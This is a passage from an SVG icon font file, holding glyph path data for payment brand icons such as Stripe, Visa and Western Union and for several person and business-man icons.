0 0 0 0 1 1 1 1 1 2l2 3s0 0 0 0l2 2 0 1c0 0 1 0 1 0 0 1 0 1 0 1 0 0 0 0 0 1 1 0 1 0 1 0 0 1 0 1 1 1 0 0 0 1 1 1 0 1 1 1 1 2l2 1s1 1 1 2c1 0 1 1 2 1v0c0 0 1 1 1 1 1 1 1 1 2 1l0 1c1 0 2 0 2 1l2 1c1 0 1 1 2 1l2 1 2 1c1 0 2 1 3 1l2 1c1 1 3 1 5 2 1 0 2 0 3 0 2 1 3 1 5 1l2 0h1c0 0 0 0 0 0l2 0c1 1 2 1 2 1h5c1 0 1 0 2-1 1 0 2 0 2 0s2 0 2 0c1 0 2 0 2 0 1 0 2 0 2 0 1-1 2 0 3-1l2 0 0 0 2-1 0 0 2 0c0 0 0-1 0-1 1 0 2 0 2 0s2-1 2-1c3-1 6-3 8-4 0-1 1-1 1-1 1 0 1 0 1-1l1-1s1-1 2-1c0 0 0 0 0 0l1-1 1-1 1-1c1-1 1-1 2-2s1-2 2-3c10-13 15-32 15-55 0-4 0-15-1-17z m-183 18c0-15-2-26-6-34-4-7-10-11-17-11-5 0-9 1-13 3v71c8 8 15 9 18 9 12 0 18-13 18-38z m139 11h-35c2 21 7 31 18 31 11 0 17-10 17-31z" />
<glyph glyph-name="stripe" horiz-adv-x="1000" unicode="&#xece5;" d="M877 364c2 33 11 48 28 48 16 0 25-15 26-48h-54z m123-19c0 36-8 65-24 85-15 21-39 32-70 32-62 0-101-46-101-120 0-41 10-72 31-92 18-18 44-27 78-27 32 0 61 8 79 20l-8 50c-18-10-39-15-63-15-14 0-24 3-31 9-7 7-12 17-13 32h121c0 4 1 20 1 26z m-293-50c-6-11-15-17-25-17-8 0-14 1-20 4v110c12 13 23 14 27 14 19 0 28-20 28-59 0-23-3-40-10-52z m61 142c-13 16-31 25-54 25-21 0-40-9-57-28l-4 23h-64v-314l73 12v73c11-3 22-5 33-5 18 0 45 5 65 27 20 22 30 55 30 99 0 39-7 69-22 88z m-282 20h74v-229h-74v229z m37 23c21 0 39 17 39 39 0 21-18 38-39 38-21 0-39-17-39-38 0-22 18-39 39-39z m-68-19c-21 0-38-11-44-31l-4 27h-65v-229h74v149c9 11 22 15 40 15 3 0 8 0 13-1v68c-5 1-10 2-14 2z m-141-58l9 54h-47v66l-63-10-9-56-22-3-8-51h30v-107c0-27 7-46 22-58 12-10 29-15 54-15 19 0 30 3 38 6v57c-4-1-14-3-21-3-15 0-21 7-21 24v96h38z m-209-32c-22 8-34 14-34 24 0 8 7 13 19 13 22 0 45-9 61-16l8 54c-12 6-37 16-72 16-25 0-46-7-61-19-15-13-23-31-23-53 0-40 25-57 64-72 26-9 35-15 35-25 0-10-9-16-24-16-18 0-49 9-69 21l-9-55c17-10 49-20 82-20 26 0 48 6 63 18 17 13 25 32 25 57 0 41-25 58-65 73z" />
<glyph glyph-name="visa-alt" horiz-adv-x="1000" unicode="&#xece6;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-628-257c23 0 46 0 68-1 14 0 23-8 26-22 5-23 10-46 14-70-22 49-63 73-110 92 1 0 2 1 2 1z m132-176c-14 0-29 0-43 0-3 0-5 0-6 4-12 45-24 90-35 135-1 1 0 1 0 2 8-1 24-14 41-37 12-15 22-31 26-50l2 5c13 38 26 75 38 113 2 3 4 4 7 4 13 0 26 0 39 0 2 0 4 0 6 0-2-6-4-11-6-15-21-53-42-105-63-157-1-3-3-4-6-4z m138 154l-22-137c-1-4-2-8-2-12-1-4-2-6-7-5-12 0-24 0-36 0-1 0-3 0-5 0 1 12 3 23 5 34l15 99 7 39c0 3 1 4 4 4 14 0 27 0 41 0 1 0 2 0 3 0-1-8-2-15-3-22z m45-159c-13 0-25 3-37 7-3 1-5 2-4 6 2 11 5 22 7 33 8-2 15-5 22-6 14-4 29-5 43 0 11 4 14 16 5 24-5 5-12 9-18 12-12 6-24 12-32 23-11 16-12 41-1 57 8 13 20 20 34 24 24 7 48 5 72-2 3-2 5-3 4-8-2-9-4-18-6-28 0-1-1-3-1-5-6 3-10 5-15 7-12 5-24 5-36 1-6-1-11-5-12-12s2-11 7-14c9-5 19-9 28-15 7-5 14-9 19-16 16-17 13-41-2-58-21-22-46-32-77-30z m219 5c-14 0-11-3-15 12 0 4-1 8-2 13-19 0-37 0-56 0-1 0-3-2-3-4-3-5-5-12-7-17-1-2-3-4-5-4-14-1-27 0-41 0-1 0-1 0-2 0 1 4 3 8 5 12 14 34 29 67 44 101 8 20 17 39 25 59 1 3 3 4 6 4 14 0 28 0 41 0 4 0 5-1 6-5 7-38 15-77 23-116 4-16 7-32 11-49 0-2 0-4 0-7-10 1-20 0-30 1z m-38 122c-8-21-16-42-24-63h38c-4 21-9 42-13 63 0 0-1 0-1 0z" />
<glyph glyph-name="visa-electron" horiz-adv-x="1000" unicode="&#xece7;" d="M715 376c2 0 3-1 3-1 25 0 49 0 73 0 3 0 7 4 8 7 5 10 8 21 13 31 1 3 4 6 6 6 32 0 65 0 98 0 2-9 3-16 5-23 5-26 1-21 25-21 18-1 35 0 54 0-1 5-1 8-1 12-6 29-12 58-18 87-15 68-29 136-43 204-1 6-3 8-9 8-24 0-48 0-72 0-6 0-9-2-11-7-15-35-30-69-45-104-26-59-52-119-78-178-3-7-5-14-8-21z m164 214c1 0 2 0 3 0 7-36 14-73 22-110h-67c14 37 28 74 42 110z m-385-211c22-8 44-12 67-13 53-3 98 15 134 54 27 30 32 72 5 103-10 11-23 19-35 27-16 10-32 18-48 28-9 5-16 13-13 24 2 12 10 18 21 21 22 6 43 7 64-3 8-3 16-7 26-11 1 3 2 6 3 9 3 17 5 33 9 50 2 7 0 10-7 12-42 14-84 17-126 5-25-8-46-21-61-43-19-28-18-73 2-100 15-19 36-30 57-41 11-6 23-12 32-20 16-15 11-37-10-44-25-8-50-6-75 0-13 3-25 7-39 12-4-20-9-40-13-60-1-6 2-8 7-10z m-141-4c4 0 7 0 10 0 21 0 42 0 64 0 7-1 10 2 11 9 0 8 2 15 3 22l39 241c2 13 4 25 6 38-3 1-4 1-5 1-24 0-48 0-73 0-5 0-7-2-7-7-4-23-8-46-11-69l-28-175c-3-19-6-39-9-60z m-116 0c6 0 9 2 11 7 37 92 74 185 111 277 4 8 7 17 11 27-4 0-7 0-10 0-23 0-47 0-70 0-6 1-9-1-12-8-22-66-45-132-67-198l-3-9c-7 34-25 62-46 88-32 40-60 63-74 65 0-1 0-2 0-3 21-79 42-159 63-239 2-6 5-7 10-7 25 0 51 0 76 0z m-43 148c-7 41-15 82-24 122-5 25-21 39-45 40-41 1-81 0-121 0-1 0-1 0-4-1 83-34 156-76 194-161z m170-317c-2-1-4-2-6-4 0 0 0-1 1-1 2 0 4 0 6 1 36 14 73 26 110 36 45 11 90 17 136 19 61 3 122-3 182-15 6-2 7 1 7 6 1 9 1 19 2 28 0 5 0 9 0 13-155 18-300-15-438-83z m-113-47c-30-1-59-1-89 0-5 0-7-2-7-7 0-8 0-17 0-26v-106c0-4 0-9 6-9 30 1 60 0 90 1 1 0 5 2 5 3 0 9 0 19 0 29h-56c-3 0-6 0-6 4 1 7 0 14 0 22h9c16 0 32 0 47 0 5 0 7 1 7 6 0 6 0 12 0 18 0 5-2 7-7 7-10-1-21-1-32-1h-23v26c3 0 4 1 6 1 16 0 33 0 50-1 5 0 7 2 6 7 0 6 0 13 0 19 1 5-1 7-6 7z m536-41c-16-6-26-18-30-33-13-42 13-77 62-77 18 1 39 8 49 31 10 23 8 45-8 65-15 19-48 25-73 14z m44-71c-3-7-10-10-17-10-8 0-15 3-18 11-2 5-5 10-5 17 1 8 2 12 4 17 3 7 10 11 18 11 8 1 15-2 18-10 6-12 6-24 0-36z m126 75c-8-1-14-5-21-8-2-1-4-3-6-4 0 3 0 6-1 9-11 0-22 1-33 0-1 0-4-3-4-5 0-34 0-67 0-102 10 0 21 0 31-1 5 0 7 2 7 7 0 19 0 37 0 55 0 9 8 16 18 16 9 0 12-3 12-14 0-19 0-38 0-57 0-5 1-7 6-7 9 1 18 0 27 1 2 0 5 3 5 5 0 24 1 48 0 72-1 24-18 38-41 33z m-538-3c-23 9-50 3-66-16-16-19-19-48-7-69 12-20 35-30 61-25 13 2 26 6 37 16-4 7-8 14-12 21-31-15-52-12-54 10h53c20 0 21 0 18 20-3 20-11 36-30 43z m-40-39c2 11 11 19 22 18 9 0 14-6 14-18h-36z m269 39c-8 0-15 0-22 0 0 11 0 21-1 30 0 2-2 6-3 6-11 0-22 0-33 0v-36c-4 0-6 0-9 0-2 0-4 0-7 0-1-5-1-10-1-15-1-13-1-13 11-13 2-1 3-1 4-1v-10c0-16-1-33 1-50 1-12 8-19 20-21 15-3 30 1 43 8 2 1 3 3 3 4-2 8-5 16-7 24-3-1-5-2-6-3-12-5-18-2-18 11 0 12 0 25 0 38 10 0 17 0 25-1 5 0 6 2 6 7 0 5 0 10 0 15 1 6-1 8-6 7z m-131-29c9 3 17 3 26 0 2-1 5 0 6 1 4 7 7 14 12 23-9 3-17 7-26 8-48 7-80-26-71-72 9-48 68-50 96-30l-13 24c-5-1-10-3-15-5-13-3-26 5-30 17-4 15 2 29 15 34z m-199 81c-11 0-22 0-33-1-1 0-4-3-4-5-1-49 0-99-1-148 0-5 3-6 7-6 8 0 15 1 23 0 7 0 9 2 9 9 0 47 0 95 0 142 0 3 0 5-1 9z m426-50c-14 4-25-2-33-14-3 5 2 12-7 12-9 1-18 1-27 0-2 0-5-3-5-5-1-32-1-64-2-96 0-5 2-6 7-6 8 0 17 0 25 0 6-1 7 2 7 7 0 17 1 33 0 49 0 6 3 9 7 12 8 6 17 5 28 3 1 12 3 23 4 34 0 1-2 4-4 4z" />
<glyph glyph-name="visa" horiz-adv-x="1000" unicode="&#xece8;" d="M999 208c-6 29-12 58-18 87-15 68-29 136-43 204-1 6-3 9-9 9-24-1-48-1-72 0-6 0-9-3-11-8-15-35-30-69-45-104-26-59-52-119-78-178-3-7-5-14-8-21 2 0 3-1 3-1 25 0 49 0 73 0 3 0 7 4 8 7 5 10 8 21 13 31 1 3 3 6 6 6 32 0 65 0 98 0 2-8 3-16 5-23 5-26 1-21 25-21 18 0 35 0 54 0-1 5-1 8-1 12z m-162 93c14 37 28 74 42 110 1 0 2 0 3 0 7-36 14-73 22-110h-67z m-137 43c-10 11-23 20-35 28-16 9-32 17-48 27-9 5-16 13-13 24 2 12 10 19 21 21 22 6 43 7 64-2 8-4 16-8 26-12 1 3 2 6 3 9 3 17 5 33 9 50 2 7 0 10-7 12-42 14-84 17-126 5-25-8-46-21-61-43-19-28-18-73 2-100 15-19 36-30 57-41 11-6 23-12 32-20 16-15 11-37-10-44-25-8-50-6-75 0-13 3-25 7-39 12-4-20-9-40-13-60-1-6 3-8 7-9 22-8 44-13 67-14 53-3 98 15 134 55 27 29 32 71 5 102z m-292 163c-5 0-7-2-7-7-4-23-8-46-11-69l-28-175c-3-19-6-39-9-59 4-1 7-1 10-1 21 0 42 0 63 0 8 0 11 2 11 10 1 7 3 14 4 21l39 241c2 13 4 25 6 38-3 1-4 1-5 1-24 0-49 0-73 0z m-38 0c-5 0-8 0-11 0-23 0-46 0-69 0-6 1-10-1-12-8-22-66-45-132-67-198l-3-9c-7 34-25 62-46 88-32 40-60 63-74 65 0-1 0-2 0-3 21-79 42-159 63-239 1-6 5-7 10-7 25 0 50 0 76 0 5 0 8 2 11 7 37 93 74 185 111 277 4 8 7 17 11 27z m-176-163c-7 41-15 82-24 122-5 25-21 39-45 40-41 1-81 0-121 0-1 0-1 0-4-1 83-34 156-76 194-161z" />
<glyph glyph-name="western-union-alt" horiz-adv-x="1000" unicode="&#xece9;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-105-263c1 0 2 0 3 0 9 0 19 0 29 0 2 0 3-1 4-3l14-39c0-1 0-2 1-3 1 15 1 30 1 44 1 1 1 1 2 1 6 0 13-1 19 0 2 0 2-1 2-3v-70c0-1 0-1 0-2-1 0-1 0-2 0h-31c-1 0-2 0-3 2-4 13-9 26-13 40-1 1-1 2-2 3 0 0 0 0 0 0 0-1-1-2-1-3 0-13 0-26 0-40 0-2 0-2-2-2-7 0-14 0-21 0v75z m-443-11c-4-18-8-37-12-56-1-2-1-4-2-7 0 0-1-1-1-1-10 0-20 0-30 0 0 0 0 0-1 0-2 16-4 32-7 48 0 0 0 0 0 0l-2-7c-1-8-2-15-3-22-1-6-1-11-2-17 0-1-1-2-3-2-9 0-18 0-27 0-2 0-2 0-3 2-2 9-4 18-6 27l-9 44c0 1 0 1 0 1 0 1 1 1 1 1h23c1 0 2-1 2-2 2-13 3-26 5-38 0-3 1-5 1-7h1c0 4 1 9 2 13l3 23c1 3 1 5 1 8 1 2 1 3 3 3 9-1 17-1 26 0 2 0 2-1 2-2l6-41c1-1 1-3 1-4 0 0 1 0 1 0 1 10 3 20 4 30l2 15c0 0 1 1 2 1 7 1 15 1 23 0l1 0c0-3-1-6-2-10z m76-64h-54c-1 0-1 0-1 0-1 1-1 2-1 3v69c0 3 0 3 3 3h52c2 0 2-1 2-3 0-5 0-10 0-14 0-2 0-3-2-3-8 0-16 0-24 0h-2v-8c1 0 2 0 3 0 7 0 14 0 21 0 2 0 2-1 2-3 0-4 0-9 0-14 0-2-1-2-2-2-7 0-14 0-21 0h-3c0-3-1-6 0-9 0 0 1 0 2 0 8 0 16 0 24 0 3 0 3 0 3-3v-14c0-1 0-2-2-2z m90-67c0-11-5-19-15-22-14-5-27-5-40 0-10 4-15 12-15 23 0 16 0 32 0 48 0 2 0 2 2 2l26 0c0 0 0 0 1 0v-47c0-2 0-4 1-6 1-3 3-4 5-4 3 0 5 2 6 4 0 2 0 4 0 6 1 14 0 29 0 44v3h27c2 0 3 0 3-2 0-16 0-33-1-49z m1 86c-2-10-8-16-18-19-11-3-22-3-33 0-8 2-15 6-18 15-2 7-2 7 5 7h19c2 0 3 0 3-2 1-4 4-6 8-6 4 1 6 3 7 6 0 2-1 4-3 5-3 2-7 3-11 4-5 2-11 3-17 5-7 4-11 10-11 19 1 10 6 17 16 21 10 3 19 3 29 2 6-1 12-3 16-7 4-4 6-10 6-15h-24c-1 0-2 0-2 1-1 4-2 5-6 5-2 0-3 0-5-1-2 0-3-2-3-4 0-2 1-3 3-4 2-1 5-1 7-2 7-2 13-4 19-6 11-4 15-13 13-24z m17 37c0 6 0 12 0 18h66v-18c0-1 0-1-1-1-5 0-10 0-15 0-2 0-2-1-2-3l0-49c0-3-1-3-3-3-8 0-16 0-24 0h-2v3c0 16 0 33 0 49 0 2-1 3-3 3-5 0-9 0-14 0-1 0-2 1-2 1z m83-146h-33c-2 0-3 0-3 2-4 12-9 24-13 36-1 2-2 5-3 7 0-1 0-3 0-4 0-13 0-26 0-38 0-3-1-3-3-3-6 0-12 0-19 0-1 0-2 0-2 2 0 24 0 47 0 71 0 1 1 2 2 2 11 0 21 0 31 0 2 0 3-1 3-2l14-40c0-1 1-2 1-3l1 0v43c0 1 0 2 2 1l21 0c0 0 0 0 1 0v-74z m54 2c0-1 0-1 0-2h-19c-3 0-5 0-8 0-2 0-2 0-2 2 0 8 0 16 0 24v46c0 2 0 3 3 2 8 0 16 0 24 0 1 0 2 0 2-2 0-23 0-47 0-70z m6 88h-55c-1 0-1 0-1 0v75h54c2 0 2-1 2-3 0-5 0-9 0-14 0-2 0-3-2-3-8 0-16 0-24 0h-2v-7c0-1 1-1 2-1 7 0 14 0 21 0 2 0 3-1 3-3 0-5 0-9 0-14 0-2-1-2-2-2l-22 0c-2 0-3-1-2-3 0-2-1-5 0-6 1-1 4 0 6 0h23v-17c0-1 0-2-1-2z m91-70c-5-13-15-19-28-22-3 0-5 0-8 0-9 0-18 2-25 7-7 6-11 13-13 23-2 11-1 22 5 33 5 7 12 12 21 14 8 2 17 2 25 0 11-3 19-11 23-22 4-11 4-22 0-33z m2 70h-24c-2 0-3 0-3 2l-3 18c-1 5-5 8-10 7-1 0-1-2-1-2 0-8 0-15 0-23 0-2-1-2-2-2-9 0-17 0-25 0 0 0-1 0-2 0 0 1 0 2 0 2v70c0 2 0 3 2 3 14 0 29 0 43 0 4-1 8-1 12-2 7-2 12-8 13-15 0-6-1-12-7-16-1-1-3-2-5-3-1 0-2-1-3-1v0c2-1 3-1 5-2 4-1 7-4 7-8 1-5 2-10 3-14 0-4 1-8 2-12 0 0 0-1 0-2-1 0-1 0-2 0z m98-88c0-2 0-2-2-2-10 0-20 0-31 0-1 0-2 0-2 1-5 14-10 27-14 41-1 1-1 2-2 3l-1 0v-11c0-11 0-21 1-32 0-2-1-2-3-2-6 0-13 0-19 0-1 0-2 0-2 2l0 71c0 1 0 1 0 1 1 0 1 0 1 0 11 0 22 0 32 0 2 0 2 0 3-2 4-13 9-26 13-39 1-1 1-2 2-3l1 0v44c1 0 1 0 2 0h19c2 0 2 0 2-2v-70z m50-2h-11v165h11v-165z m45 0h-20v165h20v-165z m-226 147c-3 1-5 1-8 1v-9c0-6 1-7 7-5 0 0 1 0 2 1 2 1 4 4 3 7 0 3-2 5-4 5z m1-94c-1 3-3 4-6 4-4 0-6-2-7-7-1-4-1-8-1-13h0c0-2 0-4 0-6 1-4 1-7 2-10 1-3 3-4 6-4 3 0 6 2 7 6 2 7 2 14 1 21 0 3-1 6-2 9z" />
<glyph glyph-name="western-union" horiz-adv-x="1000" unicode="&#xecea;" d="M120 466c-1 0-2-2-2-3-1-6-2-13-3-20-2-14-4-28-6-42 0 0 0 0-1 0 0 2 0 4-1 5-3 19-5 38-8 57-1 2-1 3-3 3-13 0-25 0-37 0-3 0-3-1-4-3 0-4-1-8-1-13-2-10-3-21-5-31-1-7-2-13-3-19h-1l-1 10c-3 18-5 35-7 53-1 2-1 3-4 3l-31 0c0 0-1-1-2-1 0 0 0-1 0-1l14-63c2-12 5-25 8-37 0-3 1-3 3-3 13 0 26 0 39 0 3 0 3 1 4 3 1 8 2 16 3 24 1 10 3 20 4 30 1 3 1 7 2 10l1 0c3-22 7-45 10-67 0 0 1 0 1 0 14 0 28 0 41 0 1 0 2 1 3 2 1 3 1 6 2 9 6 27 11 53 17 79 1 5 2 10 3 14-1 0-1 1-1 1-12 0-23 0-34 0z m374-127c-2 0-2-1-2-2v-60l-1 0c-1 1-1 3-2 4-7 19-13 37-19 55-1 2-2 3-4 3-15 0-29 0-44 0-2 0-3-1-3-3 0-33 0-65 0-98 0-3 1-4 3-4 9 1 18 1 26 0 3 0 4 1 4 4 0 18 0 36 0 54 0 2 0 4 1 6 2-3 3-7 4-10 6-17 12-34 18-51 0-2 2-3 4-3 12 0 25 0 37 0h9v104c-1 1-1 1-1 1-10 0-20 0-30 0z m311 26c0 18 0 37 0 55 0 2 0 3 0 4l1 0 2-4c6-19 13-38 19-56 1-2 2-3 4-3 15 0 29 0 43 0 1 0 2 0 3 0 0 1 1 2 1 3v99c0 2-1 3-4 3l-26 0c-1 0-2 0-3 0-1-21 0-42-1-63-1 1-2 3-2 4-7 18-13 37-19 55-1 3-3 4-6 4-14 0-27 0-41 0-1 0-3 0-4 0v-105c10 0 20 0 29 0 3 0 4 1 4 4z m70-26c-10 0-19 0-28 0-1 0-1 0-3 0v-62l-1 0c0 1-1 3-2 5-6 18-13 36-19 55-1 2-1 2-4 2-14 0-29 0-44 0l-2 0c0 0 0-1 0-1 0-34 0-67 0-100 0-3 1-3 3-3 9 0 17 0 26 0 3 0 4 1 4 3 0 15 0 30 0 44v16c0 0 0 0 1 0 0-1 1-3 2-4 6-19 13-38 19-57 1-2 2-2 4-2 14 0 29 0 43 0 3 0 3 1 3 3v98c1 3 0 3-2 3z m-136 41c-1 7-2 13-3 20-1 6-5 10-10 12-3 1-5 1-7 2v0c2 1 3 1 5 2 2 1 4 2 7 4 7 6 9 14 8 22 0 11-7 19-17 21-6 2-12 3-18 3-19 0-39 0-59 0-3 0-3-1-3-4l0-97c0-2 0-3 0-4 1 0 2 0 3 0 11 0 22 0 34 0 2 0 3 1 3 3 0 11 0 21 0 32 0 1 0 2 1 3 7 2 14-2 15-9l4-26c1-2 2-3 4-3 11 0 22 0 34 0 0 0 1 0 2 0 0 1 0 2 0 3-1 5-2 11-3 16z m-44 44c-1-1-2-1-3-1-9-3-10-2-10 7v13c4-1 8-1 11-2 4 0 6-3 7-7 0-4-2-8-5-10z m-313-85h-38v-4c0-21 0-42 0-62 0-3 0-6-1-8-1-4-4-5-8-5-3 0-6 1-7 5-1 2-2 5-2 8 0 21 0 42 0 62v4c-1 0-1 0-1 0-13 0-25 0-37 0-2 0-3-1-3-2 0-23 0-46 1-69 0-14 7-25 20-31 19-7 38-7 56 0 14 4 22 15 23 30 0 23 0 46 0 70 0 2-1 2-3 2z m322 1c-11 3-22 3-34 0-12-3-22-9-29-20-9-14-10-30-7-46 2-13 7-24 18-32 10-7 22-10 34-10 4 0 8 0 12 1 18 3 32 12 38 30 6 15 6 31 1 46-5 16-16 27-33 31z m-8-73c-2-6-5-8-10-8-3 0-7 1-8 5-1 5-2 9-3 14 0 3 0 6 0 9h0c0 6 1 12 2 18 1 7 4 10 10 10 3 0 7-2 8-5 1-4 2-9 2-13 1-10 1-20-1-30z m-329 154c-8 4-17 6-26 9-4 1-7 2-11 3-2 1-4 3-4 6 0 3 2 4 4 5 3 1 5 1 8 1 4 0 7-2 8-6 0-2 1-3 3-3 7 1 15 0 22 0h11c1 8-2 16-8 21-6 7-14 9-23 10-13 2-27 2-40-2-14-5-21-15-22-29-1-13 4-22 15-27 8-3 16-5 24-8 5-1 10-3 15-4 3-2 5-4 4-8 0-4-4-7-9-8-7 0-11 3-12 8 0 3-1 4-4 4-9 0-17 0-26 0-10 0-11-1-8-11 5-12 14-19 26-21 16-4 31-4 46 1 13 4 23 12 25 26 3 16-3 27-18 33z m-111-33c-11 0-22 0-34 0-1 0-2 0-2 1-1 4-1 7-1 11h5c9 0 19 0 29 0 3 0 4 1 4 4-1 6-1 13 0 19 0 3-1 4-4 4-10 0-20 0-29 0-2 0-3 0-4 0v12h3c11 0 22 0 33 0 3 0 4 0 4 3 0 7-1 13 0 20 0 3-1 4-4 4-24 0-48 0-72 0-4 0-4 0-4-4v-97c0-1 0-3 0-4 1 0 2 0 2 0 26 0 51 0 76 0 3 0 3 1 3 3 0 6 0 13 0 19 0 5 0 5-5 5z m355 0h-32c-3 0-7-1-9 0-1 2 0 6-1 9 0 2 1 3 3 3l31 0c3 0 4 1 3 3 0 7 0 13 0 20 1 3 0 4-4 4-10 0-20 0-30 0-1 0-3 0-3 2v10h4c11 0 22 0 33 0 3 0 4 0 4 3 0 7 0 14 0 20 0 3-1 4-4 4-24 0-48 0-72 0h-3v-105c0 0 0 0 1 0 25 0 51 0 77 0 2 0 2 1 2 2v25z m-176 46c0-23 0-46 0-69v-4h4c11 0 22 0 33 0 3 0 4 1 4 4l0 70c0 2 1 3 4 3 6 0 13 0 20 0 1 0 2 0 2 2v26h-93c0-9 0-18 0-26 0-1 2-2 3-2 6 0 13 0 19 0 4 0 4-1 4-4z m163-95c-11 0-23 0-34 0-3 0-4 0-4-3 0-22 0-44 0-65 0-11 0-22 0-33 0-3 1-3 3-3 4 0 8 0 12 0h26c0 1 0 2 0 2 0 33 0 66 0 99 0 3-1 3-3 3z m316 128h15v-230h-15v230z m58 0h28v-230h-28v230z" />
<glyph glyph-name="boy" horiz-adv-x="1000" unicode="&#xeceb;" d="M86 18c12 46 46 73 82 97 52 36 110 60 170 79 5 2 9-1 13-4 32-24 67-41 106-49 58-11 112 0 162 29 11 7 22 13 32 21 3 3 7 4 11 3 67-22 132-49 188-92 22-16 42-35 55-60 4-8 5-16 9-24 0-54-1-108 0-162 0-5-1-6-6-6-272 0-544 0-816 0-5 0-6 1-6 6 0 54 0 108 0 162z m612 135c-7 2-12 4-17 6-13 7-23 5-36-4-58-37-120-53-189-41-40 7-76 23-109 46-3 2-6 6-11 5-11-4-23-8-36-12 62-46 127-73 202-72 73 1 137 27 196 72z m-323 660c-6-10-7-22-5-33 1-7 4-7 9-3 43 46 100 62 159 73 1 0 2 0 4 0-14-13-26-25-33-44 77 23 150 14 221-22-10-3-20-3-29-7-8-4-17-9-24-17 50-14 96-33 132-74-20-1-36-2-54-9 17-12 33-23 48-36 6-5 6-9 1-15-14-20-30-39-52-52-4-3-5-6-5-11-2-20-5-41-9-62-1-3-2-7 2-10 25-17 28-43 24-70-7-35-24-63-55-81-5-3-6-8-8-12-25-67-71-114-138-139-57-20-111-13-163 17-49 29-84 70-103 125-2 5-5 8-10 11-37 20-62 80-50 120 4 11 9 21 19 27 7 4 7 9 6 16-8 46-10 92-3 137 6 46 18 90 48 127 18 22 45 40 68 44z m122-608c8 0 15 0 22 1 79 16 131 63 158 138 4 9 5 19 18 20 3 0 6 3 9 5 18 16 31 36 34 60 2 22-1 40-28 45-6 1-5 5-4 9 1 20 3 40 1 61-1 4-1 8-7 6-31-10-64-14-97-16-42-2-84 2-123 17-38 15-71 37-104 59-20 14-23 14-42-3-3-2-5-4-7-6-29-34-35-75-33-118 0-6-1-8-7-9-19-5-26-15-27-35-1-21 8-38 20-55 8-11 17-21 32-23 5-1 5-5 6-8 6-25 17-47 33-67 37-48 85-78 146-81z m3 85c-19 1-36 3-52 10-4 2-7 4-4 8 3 4 1 13 11 10 30-11 60-11 91 0 9 3 7-7 10-11 4-4 0-6-3-7-18-7-36-9-53-10z" />
<glyph glyph-name="business-man-alt-1" horiz-adv-x="1000" unicode="&#xecec;" d="M908 47c-2 41-13 76-52 96-11 6-23 12-34 16-45 19-90 36-135 54-22 9-23 8-29-14l-85-320c-2-6-2-12-7-18-1 5-2 9-3 12-6 54-13 107-18 160-5 46-18 92 1 138 4 7-2 8-8 8-23 0-47-1-70 0-13 0-18-2-13-15 9-25 12-51 7-77-4-21-6-43-9-65-6-53-13-107-19-160h-3c-1 3-2 5-3 7-29 109-58 219-87 328-7 23-9 25-32 16-44-18-88-35-132-53-20-8-38-18-55-32-16-14-26-31-28-53-6-58-12-116-17-174-3-35 13-51 47-51 99 0 198 0 297 0 152 0 305 0 457 0 31 0 48 19 45 48-6 49-12 99-15 149z m-623 394c6-10 13-19 24-22 4 0 4-3 5-5 8-30 21-58 40-83 28-37 63-65 109-76 8-2 16-3 23-4h28c9 2 19 3 28 5 36 10 66 31 91 59 26 28 43 61 53 98 1 4 3 6 7 7 13 5 21 16 25 29 5 14 12 28 15 43v17c-1 6-3 12-5 18-3 9-8 17-17 22-2 1-2 3-1 5 16 35 13 72 9 109-3 25-9 50-17 74-6 21-19 38-35 52-25 20-54 35-85 43-15 4-29 1-42-7-4-3-8-6-12-9-5 21-23 25-39 29-9 2-19 3-28 5h-28c-5-2-11-2-16-3-16-3-30-10-43-21-32-27-58-59-75-98-12-29-16-60-20-91-3-28 1-55 10-81 1-4 1-6-3-8-11-8-16-20-18-33-4-18 0-34 7-50 4-7 5-16 10-24z m6 86c4 7 6 7 9 0 6-11 16-18 26-25-6 54 2 106 6 158 6-8 11-17 19-26-4 16-8 31-6 47 5-8 7-15 14-22-2 8-3 15-2 22 2 23 15 37 36 45 21 7 42 9 63 2 28-9 54-7 81 2 12 4 24 7 36 5 21-4 35-17 44-35 6-10 9-21 16-30 5-9 12-15 21-19 10-4 11-6 11-17-1-5-1-10-2-15-2-11-1-22 5-32 4-9 7-17 12-25 4-8 5-17 4-25-1-12-2-24-2-38 7 11 12 21 17 31 2 4 4 4 7 1 4-5 6-11 8-17 2-14 1-28-6-41-3-6-5-12-7-19-2-4-4-8-7-12-4-4-9-7-15-5-4 1-5-2-6-5-7-28-17-54-33-78-27-43-64-73-115-83-39-7-75 2-108 24-45 31-71 74-86 125-1 2-1 4-2 6-1 3-1 7-3 10-2 3-6 0-9 0-6 1-11 4-13 9-8 17-17 34-19 53-1 11 1 21 6 29z" />
<glyph glyph-name="business-man-alt-2" horiz-adv-x="1000" unicode="&#xeced;" d="M914 50c-3 42-14 77-53 97-11 6-23 12-34 16-46 19-92 37-137 55-22 9-23 8-29-15-29-108-58-216-87-324-1-6-2-12-7-18-1 5-2 9-2 12-7 55-14 109-19 163-5 46-19 93 1 139 4 8-2 8-8 8-24 0-48-1-72 0-12 1-17-2-12-15 9-25 12-51 7-78-5-22-6-44-9-66-7-54-13-108-20-162h-3c-1 3-2 5-3 7-29 111-58 222-88 332-6 24-9 25-32 16-44-18-89-35-134-53-20-8-39-19-55-33-16-14-27-31-29-53-6-59-12-118-17-177-3-35 12-51 48-51 100 0 200 0 300 0 154 0 309 0 464 0 30 0 48 19 45 48-6 50-12 101-15 152z m-593 373c2-1 3-3 3-5 9-30 22-58 39-84 35-50 82-78 145-78 31 1 59 13 85 30 30 21 50 51 66 83 7 16 14 32 19 49 0 2 0 4 3 5 13 4 21 13 25 26 5 13 13 26 15 41 2 19-1 37-15 52-2 2-2 3-2 5 3 42 6 84 3 125-1 24-5 46-17 67-7 12-18 22-28 32-13 13-27 26-44 36-2 2-2 4-2 7 2 7 2 7-6 7-6 0-12 1-19 1-4 0-5 1-3 5 1 3 1 6 2 10-9-2-16-5-25-7 2 7 5 13 7 20h-1c-13-7-25-12-39-16-8-2-18 0-27 0-38-2-73-13-106-33-8-5-16-11-24-18-9-7-21-10-31-15-8-4-6-4-2-9 4-7 5-7-3-10-8-3-16-6-24-10 3-3 7-5 11-7 6-4 6-4 1-8-6-5-13-10-19-15-1-1-2-1-2-3 4-1 8 1 12 1 4 1 4 0 4-4-5-14-8-29-10-45-6-33-8-66-9-100 0-1 0-2 0-3 2-5 0-8-4-10-12-7-16-19-18-32 0-2 0-3-1-4v-18c2-14 9-26 13-39 5-14 13-25 28-29z 